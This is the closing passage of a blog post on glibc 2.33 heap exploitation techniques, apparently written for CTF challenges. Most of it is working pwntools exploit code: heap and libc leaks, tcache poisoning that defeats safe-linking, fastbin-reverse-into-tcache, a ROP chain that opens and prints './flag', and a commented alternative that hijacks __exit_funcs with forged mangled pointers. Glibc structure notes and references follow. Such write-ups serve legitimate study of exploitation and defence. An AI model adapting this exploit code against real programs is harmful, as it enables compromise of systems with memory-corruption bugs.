payload = ""
payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
payload += "./flag"
return payload

rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

ropchain_addr = heap_base + 0xE00
ropchain = flat([add_rsp_0x28, ropchain_addr, rdi2rdx, 0, rdx2rsp])
ropchain += p64(0) # padding
ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

for i in range((len(ropchain) + 8) // 0x10):
arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# prepare buffer for FSOP
arbitrary_write(heap_base + 0x160, p64(0) + p64(libc_base + libc.sym['__free_hook'] - 0x10)) # tcache bin (0x1D0) = &__free_hook - 8
arbitrary_write(heap_base + 0x40, p64(0x1000000000000) + p64(heap_base + 0xE00)) # tcache count (0x1D0) = 1

# clear fastbin
edit(0, "\x07")
delete(1)
edit(1, p64(heap_base >> 12))
edit(0, "\x00")
add(1)

# trigger exit
delete(1)
edit(0, "\x02")
edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
add(1)
add(2)
####################################


# #################################### Method 2: hijack __exit_funcs
# # leak heap base
# add(0)
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# heap_base = u64(p.recv(8)) << 12

# # leak libc base
# for i in range(0x23):
# add(1)
# add(2)
# delete(1)
# delete(2)
# edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
# add(1)
# add(1)
# edit(1, p64(0) + p64(0x421))
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# # malloc tcache_struct
# add(1)
# delete(0)
# delete(1)
# edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
# add(0)
# add(0) # chunk 0 points to tcache_struct

# # prepare fastbin
# add(1)
# for i in range(5):
# add(2)
# edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1ed630 - 0x10) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change fs:[0x30] to (heapbase + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)
# edit(0, "\x00") # "clear" the tcache bin
# add(1)
# __pointer_chk = (heap_base + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # ORW
# def orw_payload(libc_base, orwchain_base):
# pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
# pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
# pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
# func_cnt = 3
# args_cnt = 2 + 3 + 1
# payload = ""
# payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
# payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
# payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
# payload += "./flag"
# return payload

# rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
# rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
# add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

# ropchain_addr = heap_base + 0xA00
# ropchain = flat([add_rsp_0x28, ropchain_addr, 0, 0, rdx2rsp])
# ropchain += p64(0) # padding
# ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

# for i in range((len(ropchain) + 8) // 0x10):
# arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# # forge __exit_function
# edit(0, "\x00") # "clear" the tcache bin
# arbitrary_write(heap_base + 0x10, p64(0) + p64(1)) # exit_function_list->next = NULL, exit_function_list->idx = 1
# encoded_rdi2rdx = rdi2rdx ^ __pointer_chk
# encoded_rdi2rdx = ((encoded_rdi2rdx << 17) & ((1 << 64) - 1)) | (encoded_rdi2rdx >> (64 - 17))
# arbitrary_write(heap_base + 0x20, p64(4) + p64(encoded_rdi2rdx)) # exit_function_list->fns[0].flavor = ef_cxa(0x4), exit_function_list->fns[0].cxa.fn = rdi2rdx
# arbitrary_write(heap_base + 0x30, p64(ropchain_addr)) # exit_function_list->fns[0].cxa.arg = ropchain_addr

# # prepare fastbin
# add(1)
# for i in range(5):
# add(2)
# edit(2, p64((heap_base + 0x3f0 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1E0738 - 0x18) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x3d0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change __exit_funcs
# edit(0, "\x00") # "clear" the tcache bin
# add(1)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # trigger exit
# delete(1)
# edit(0, "\x02")
# edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
# add(1)
# add(2)
# #####################################

success("libc_base: " + hex(libc_base))
success("heap_base: " + hex(heap_base))

p.interactive()

'''
__exit_funcs (struct exit_function_list **):

struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
'''

'''
_rtld_global->_dl_ns[0]->_ns_loaded: (link map)
offset member
0x0 l_addr (point to program base by default)
0x18 l_next (point to next link map, the length of the linked list should be no smaller than 4, and the tail node's l_next = 0)
0x20 l_prev (point to previous link map, head node's l_prev = 0)
0x110 l_info[0x1A] (
point to fini_array Elf64_Dyn structure:
typedef struct
{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
} d_un;
} Elf64_Dyn;)
)
0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val= sizeof(fini_array)
'''


'''
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ 0x10

/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */ 0x18
char *_IO_read_end; /* End of get area. */ 0x20
char *_IO_read_base; /* Start of putback+get area. */ 0x28
char *_IO_write_base; /* Start of put area. */ 0x30
char *_IO_write_ptr; /* Current put pointer. */ 0x38
char *_IO_write_end; /* End of put area. */ 0x40
char *_IO_buf_base; /* Start of reserve area. */ 0x48
char *_IO_buf_end; /* End of reserve area. */ 0x50

/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */ 0x58
char *_IO_backup_base; /* Pointer to first valid character of backup area */ 0x60
char *_IO_save_end; /* Pointer to end of non-current get area. */ 0x68

struct _IO_marker *_markers; 0x70

struct _IO_FILE *_chain; 0x78

int _fileno; 0x80
int _flags2; 0x84
__off_t _old_offset; /* This used to be _offset but it's too small. */

/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
'''

参考

  1. https://www.anquanke.com/post/id/222948
  2. https://www.anquanke.com/post/id/242640
  3. https://elixir.bootlin.com/glibc/glibc-2.33
Author: Nop
Link: https://n0nop.com/2021/11/27/Glibc-2-33%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.